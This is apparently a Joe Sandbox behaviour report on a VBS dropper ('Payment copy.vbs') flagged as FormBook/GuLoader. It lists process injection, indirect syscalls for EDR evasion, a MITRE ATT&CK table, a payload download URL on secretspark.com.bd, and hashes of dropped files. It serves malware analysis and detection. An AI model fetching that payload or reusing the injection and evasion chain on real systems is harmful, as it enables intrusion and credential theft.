Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33932594 mov eax, dword ptr fs:[00000030h]	2_2_33932594
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339BF582 mov eax, dword ptr fs:[00000030h]	2_2_339BF582
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E588 mov eax, dword ptr fs:[00000030h]	2_2_3397E588
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3397E588 mov eax, dword ptr fs:[00000030h]	2_2_3397E588
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339045B0 mov eax, dword ptr fs:[00000030h]	2_2_339045B0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339045B0 mov eax, dword ptr fs:[00000030h]	2_2_339045B0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339885AA mov eax, dword ptr fs:[00000030h]	2_2_339885AA
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339365D0 mov eax, dword ptr fs:[00000030h]	2_2_339365D0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_338FF5C7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_338FF5C7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_338FF5C7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_338FF5C7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_338FF5C7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_338FF5C7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_338FF5C7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_338FF5C7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FF5C7 mov eax, dword ptr fs:[00000030h]	2_2_338FF5C7
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3398C5FC mov eax, dword ptr fs:[00000030h]	2_2_3398C5FC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390B5E0 mov eax, dword ptr fs:[00000030h]	2_2_3390B5E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390B5E0 mov eax, dword ptr fs:[00000030h]	2_2_3390B5E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390B5E0 mov eax, dword ptr fs:[00000030h]	2_2_3390B5E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390B5E0 mov eax, dword ptr fs:[00000030h]	2_2_3390B5E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390B5E0 mov eax, dword ptr fs:[00000030h]	2_2_3390B5E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390B5E0 mov eax, dword ptr fs:[00000030h]	2_2_3390B5E0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339315EF mov eax, dword ptr fs:[00000030h]	2_2_339315EF
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF51B mov eax, dword ptr fs:[00000030h]	2_2_339AF51B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF51B mov eax, dword ptr fs:[00000030h]	2_2_339AF51B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF51B mov eax, dword ptr fs:[00000030h]	2_2_339AF51B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF51B mov eax, dword ptr fs:[00000030h]	2_2_339AF51B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF51B mov eax, dword ptr fs:[00000030h]	2_2_339AF51B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF51B mov eax, dword ptr fs:[00000030h]	2_2_339AF51B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF51B mov ecx, dword ptr fs:[00000030h]	2_2_339AF51B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF51B mov ecx, dword ptr fs:[00000030h]	2_2_339AF51B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF51B mov eax, dword ptr fs:[00000030h]	2_2_339AF51B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF51B mov eax, dword ptr fs:[00000030h]	2_2_339AF51B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF51B mov eax, dword ptr fs:[00000030h]	2_2_339AF51B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF51B mov eax, dword ptr fs:[00000030h]	2_2_339AF51B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339AF51B mov eax, dword ptr fs:[00000030h]	2_2_339AF51B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3398C51D mov eax, dword ptr fs:[00000030h]	2_2_3398C51D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33921514 mov eax, dword ptr fs:[00000030h]	2_2_33921514
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33921514 mov eax, dword ptr fs:[00000030h]	2_2_33921514
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33921514 mov eax, dword ptr fs:[00000030h]	2_2_33921514
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33921514 mov eax, dword ptr fs:[00000030h]	2_2_33921514
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33921514 mov eax, dword ptr fs:[00000030h]	2_2_33921514
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33921514 mov eax, dword ptr fs:[00000030h]	2_2_33921514
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338FB502 mov eax, dword ptr fs:[00000030h]	2_2_338FB502
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33902500 mov eax, dword ptr fs:[00000030h]	2_2_33902500
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392E507 mov eax, dword ptr fs:[00000030h]	2_2_3392E507
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392E507 mov eax, dword ptr fs:[00000030h]	2_2_3392E507
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392E507 mov eax, dword ptr fs:[00000030h]	2_2_3392E507
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392E507 mov eax, dword ptr fs:[00000030h]	2_2_3392E507
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392E507 mov eax, dword ptr fs:[00000030h]	2_2_3392E507
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392E507 mov eax, dword ptr fs:[00000030h]	2_2_3392E507
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392E507 mov eax, dword ptr fs:[00000030h]	2_2_3392E507
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392E507 mov eax, dword ptr fs:[00000030h]	2_2_3392E507
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393C50D mov eax, dword ptr fs:[00000030h]	2_2_3393C50D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393C50D mov eax, dword ptr fs:[00000030h]	2_2_3393C50D
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33903536 mov eax, dword ptr fs:[00000030h]	2_2_33903536
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33903536 mov eax, dword ptr fs:[00000030h]	2_2_33903536
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33942539 mov eax, dword ptr fs:[00000030h]	2_2_33942539
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F753F mov eax, dword ptr fs:[00000030h]	2_2_338F753F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F753F mov eax, dword ptr fs:[00000030h]	2_2_338F753F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_338F753F mov eax, dword ptr fs:[00000030h]	2_2_338F753F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33931527 mov eax, dword ptr fs:[00000030h]	2_2_33931527
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391252B mov eax, dword ptr fs:[00000030h]	2_2_3391252B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391252B mov eax, dword ptr fs:[00000030h]	2_2_3391252B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391252B mov eax, dword ptr fs:[00000030h]	2_2_3391252B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391252B mov eax, dword ptr fs:[00000030h]	2_2_3391252B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391252B mov eax, dword ptr fs:[00000030h]	2_2_3391252B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391252B mov eax, dword ptr fs:[00000030h]	2_2_3391252B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391252B mov eax, dword ptr fs:[00000030h]	2_2_3391252B
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339DB55F mov eax, dword ptr fs:[00000030h]	2_2_339DB55F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339DB55F mov eax, dword ptr fs:[00000030h]	2_2_339DB55F
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339CA553 mov eax, dword ptr fs:[00000030h]	2_2_339CA553
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33936540 mov eax, dword ptr fs:[00000030h]	2_2_33936540
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391E547 mov eax, dword ptr fs:[00000030h]	2_2_3391E547
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3390254C mov eax, dword ptr fs:[00000030h]	2_2_3390254C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3391C560 mov eax, dword ptr fs:[00000030h]	2_2_3391C560
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393B490 mov eax, dword ptr fs:[00000030h]	2_2_3393B490
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393B490 mov eax, dword ptr fs:[00000030h]	2_2_3393B490
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3398C490 mov eax, dword ptr fs:[00000030h]	2_2_3398C490
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_33900485 mov ecx, dword ptr fs:[00000030h]	2_2_33900485
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3393E4BC mov eax, dword ptr fs:[00000030h]	2_2_3393E4BC
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339024A2 mov eax, dword ptr fs:[00000030h]	2_2_339024A2
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339024A2 mov ecx, dword ptr fs:[00000030h]	2_2_339024A2
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3398D4A0 mov ecx, dword ptr fs:[00000030h]	2_2_3398D4A0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3398D4A0 mov eax, dword ptr fs:[00000030h]	2_2_3398D4A0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3398D4A0 mov eax, dword ptr fs:[00000030h]	2_2_3398D4A0
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_339344A8 mov eax, dword ptr fs:[00000030h]	2_2_339344A8
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Code function: 2_2_3392F4D0 mov eax, dword ptr fs:[00000030h]	2_2_3392F4D0

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: temp_executable.exe.0.dr

Jump to dropped file

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	NtQueueApcThread: Indirect: 0x335FF626	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	NtResumeThread: Indirect: 0x33603E8D	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x5C6D7B8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	NtSuspendThread: Indirect: 0x33603B7D	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x7FFD57442651	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x5C755BD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	NtSetContextThread: Indirect: 0x3360386D	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtClose: Direct from: 0x7FFD227C9E7F
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x5C6D98F	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtResumeThread: Direct from: 0x5C6DA06	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtMapViewOfSection: Direct from: 0x5C6D8B0	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtMapViewOfSection: Direct from: 0x5C6D8F4	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\temp_executable.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmdkey.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Thread register set: target process: 7624			Jump to behavior
Source: C:\Windows\SysWOW64\cmdkey.exe	Thread register set: target process: 7624			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"	Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Code function: 1_2_00405BB3 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

1_2_00405BB3

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000004.00000002.15051779853.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.15051694421.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.13517983847.0000000033620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Directory queried: number of queries: 1001

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000004.00000002.15051779853.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.15051694421.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.13517983847.0000000033620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	Valid Accounts	1 Native API	121 Scripting	311 Process Injection	2 Virtualization/Sandbox Evasion	OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	311 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Abuse Elevation Control Mechanism	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	13 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment copy.vbs	5%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsfBB16.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\temp_executable.exe	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://secretspark.com.bd/sCvgayhFHxN196.bin	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_Error	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
secretspark.com.bd	170.249.236.53	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://secretspark.com.bd/sCvgayhFHxN196.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	temp_executable.exe	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
170.249.236.53	secretspark.com.bd	United States		63410	PRIVATESYSTEMSUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519254
Start date and time:	2024-09-26 09:27:21 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 17m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment copy.vbs
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@7/11@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 87% Number of executed functions: 58 Number of non-executed functions: 322
Cookbook Comments:	Found application associated with file extension: .vbs Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Payment copy.vbs

Simulations

Behavior and APIs

Time	Type	Description
03:31:07	API Interceptor	10982259x Sleep call for process: cmdkey.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
170.249.236.53	Zeskanowana lista przedmiot#U00f3w nr 84329.vbs	Get hash	malicious	FormBook, GuLoader	Browse
170.249.236.53	Gescanntes Artikelliste_Bestellnummer 25477.vbs	Get hash	malicious	FormBook, GuLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
secretspark.com.bd	Zeskanowana lista przedmiot#U00f3w nr 84329.vbs	Get hash	malicious	FormBook, GuLoader	Browse	170.249.236.53
secretspark.com.bd	Gescanntes Artikelliste_Bestellnummer 25477.vbs	Get hash	malicious	FormBook, GuLoader	Browse	170.249.236.53

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PRIVATESYSTEMSUS	Zeskanowana lista przedmiot#U00f3w nr 84329.vbs	Get hash	malicious	FormBook, GuLoader	Browse	170.249.236.53
	Gescanntes Artikelliste_Bestellnummer 25477.vbs	Get hash	malicious	FormBook, GuLoader	Browse	170.249.236.53
	https://catch35.com/	Get hash	malicious	Unknown	Browse	162.246.59.110
	https://www.isobuster.com/dl.php?d=isobuster.com&v=3&l=0	Get hash	malicious	Unknown	Browse	104.193.109.63
	firmware.armv4l.elf	Get hash	malicious	Unknown	Browse	192.196.159.200
	firmware.armv5l.elf	Get hash	malicious	Unknown	Browse	192.196.159.200
	firmware.x86_64.elf	Get hash	malicious	Unknown	Browse	170.249.206.146
	NEW.P.ORDER .ENQUIRY56433.PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	170.249.217.170
	https://content.app-us1.com/LedEn/2024/08/03/19c502f2-d7fc-4021-b067-e9b1cf078dac.pdf	Get hash	malicious	HTMLPhisher	Browse	158.106.129.201
	b2bXo6vmDm.exe	Get hash	malicious	SystemBC	Browse	158.106.138.119

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	170.249.236.53
	PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbe	Get hash	malicious	GuLoader, Lokibot	Browse	170.249.236.53
	PersonalizedOffer.exe	Get hash	malicious	UltraVNC	Browse	170.249.236.53
	PersonalizedOffer.exe	Get hash	malicious	UltraVNC	Browse	170.249.236.53
	38sab1rT0H.exe	Get hash	malicious	Latrodectus	Browse	170.249.236.53
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	170.249.236.53
	update.js	Get hash	malicious	NetSupport RAT	Browse	170.249.236.53
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	170.249.236.53
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	170.249.236.53
	Zeskanowana lista przedmiot#U00f3w nr 84329.vbs	Get hash	malicious	FormBook, GuLoader	Browse	170.249.236.53

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsfBB16.tmp\System.dll	SpdbSuite_v10.8_LANG.exe	Get hash	malicious	Unknown	Browse
	SpdbSuite_v10.8_LANG.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.Win32.VMProtect.31640.28512.exe	Get hash	malicious	Unknown	Browse
	Gescanntes Artikelliste_Bestellnummer 25477.vbs	Get hash	malicious	FormBook, GuLoader	Browse
	Gescanntes Artikelliste_Bestellnummer 25477.vbs	Get hash	malicious	GuLoader	Browse
	Fac001982024-06-05.pdf.exe	Get hash	malicious	GuLoader	Browse
	ALGOI-la tabla de c#U00e1lculos.xlsl.exe	Get hash	malicious	GuLoader	Browse
	Fac001982024-06-05.pdf.exe	Get hash	malicious	GuLoader	Browse
	ALGOI-la tabla de c#U00e1lculos.xlsl.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Ankelknogle.Bil

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	462406
Entropy (8bit):	2.654120104593977
Encrypted:	false
SSDEEP:	1536:N0Zv7tdkzVZEvSOjcL+8E9sPBcybc8BOYAgjNRvEXwuzQDh1l0mY43frkdRwGkYZ:n8BWk7SzJ9ynyM5+663Og+dKlBi2O
MD5:	B10F8C50F169E6BA850E8AE984DB5D15
SHA1:	953A30728554D87B4C9CC1BD308BD2B9DCE23553
SHA-256:	865F8417D84EE8EBFCB82FE6F9CBE53E8684CFE198B24C99D9792945DFB71FFF
SHA-512:	9E183934673FEDB7DCEF683709449B10ABC05C55CBB043CCBA0C5F5218BB6F445D68D6E086D1472A9B779EEB47CD0741113FA143E42CB6BF42CDE50D11FD4A89
Malicious:	false
Reputation:	low
Preview:	0000494900000000000078787800006F6F00320000000000000045450000000000484848480000780000000000A1A100000071717171008E00002C000000004900003C3C000000000000130000007C0040400005003C3C000000CBCB00000D00F20000000000000000CC0054002B2B00969696969696000000C3C30000303030303000585858585858008D8D000000EFEFEFEFEFEF000000007200F000D9D9D900004E0000520000930000D6006000484848000000D4D4D40000200064000000490004004600787878006300CC0083838383000E0E0017171700E4009E00B20000BCBCBC000800E00000000000000000B6B6B6B600004D4D00C00043006C6C002E00FFFF000000C6C600D30000AEAE0009000000000000000067670000606000F1006F6F00DB00C1C1002F2F00006060606060600000DE0017170000000C0C007000000000F5F500009C9C9C004E4E4E000021212100B0000080808000CF002900484800E000BFBF000076767600002020202000B900FFFFFF0000000A00003C000000000000FD0000E7002A2A2A2A2A2A00005400BBBB0000414141410000007C7C7C7C7C0000000000000000A700000000AD000000000000001010008000000000FC00000000810000B60000F4F4F40000004444444444444400E800676767670080000000007200000000007777007400AB00

C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Beslaas.fly

Download File

Process:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
File Type:	GTA audio index data (SDT)
Category:	dropped
Size (bytes):	354911
Entropy (8bit):	1.2495424264884372
Encrypted:	false
SSDEEP:	768:Mh2p8ZOcN5dHUpkDIF7Nmi8BtV/UA+NGBe6ilbUpqpSXZyBFCYJI5RY5UaDXUN6R:jJ6SW7cAIvP2U8mlff5ndkZttOuwJ
MD5:	32D41B5BEB9F4F21054B26B90A440E44
